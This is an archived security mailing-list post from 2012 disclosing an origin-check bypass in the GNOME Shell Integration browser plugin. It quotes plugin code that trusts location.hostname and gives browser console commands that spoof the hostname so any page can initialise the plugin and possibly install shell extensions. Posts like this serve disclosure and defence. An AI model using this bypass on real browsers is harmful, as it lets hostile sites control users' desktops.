Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Sun, 9 Sep 2012 00:36:26 +0200
From: Tavis Ormandy <>
Subject: note on gnome shell extensions

List, I just installed Fedora 17 on a workstation. While researching how to
upgrade gnome 3 to version 2, I noticed it installed a browser extension
called "Gnome Shell Integration".

$ rpm -qf /usr/lib64/mozilla/plugins/

The NPPVpluginDescriptionString states "It can be used only by", but I happen to know that is a tricky thing to get

102   if (!funcs.getproperty (instance, NPVARIANT_TO_OBJECT (document),
103                           funcs.getstringidentifier ("location"),
104                           &location))
105     goto out;
107   if (!NPVARIANT_IS_OBJECT (location))
108     goto out;
110   hostname = get_string_property (instance,
111                                   NPVARIANT_TO_OBJECT (location),
112                                   "hostname");
114   if (g_strcmp0 (hostname, ORIGIN))
115     {
116       g_debug ("origin does not match, is %s",
117                hostname);
119       goto out;
120     }

I'm familiar with this topic as I wrote a tool for managing broken but
necessary plugins by restricting them to trusted domains.

As far as I know, browsers only attempt to prevent tampering with
document.location.href, anything else can be modified. For example, this
works in Chrome, I don't know the syntax for Mozilla:

> location.__defineGetter__("hostname", function () { return "arbitrary"; })
> location.hostname


> location.__defineGetter__("href", function () { return "arbitrary"; })
> location.href

So this should fail:

> o = document.createElement('OBJECT')
> o.setAttribute('TYPE', 'application/x-gnome-shell-integration')
> document.body.appendChild(o)
  <object type=?"application/?x-gnome-shell-integration">?</object>?
> o.shellVersion

But we can re-insert it and make it work:

> document.body.removeChild(o)
  <object type=?"application/?x-gnome-shell-integration">?</object>?
> location.__defineGetter__("hostname", function () { return
""; })
> document.body.appendChild(o)
  <object type=?"application/?x-gnome-shell-integration">?</object>?
> o.shellVersion
> document.location.href

The plugin incorrectly trusted hostname, and initialized. As far as I can
tell, the plugin will let you install new shell extensions, I don't know
what the impact of that is, can they contain native code?


------------------------------------- | pgp encrypted mail preferred

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ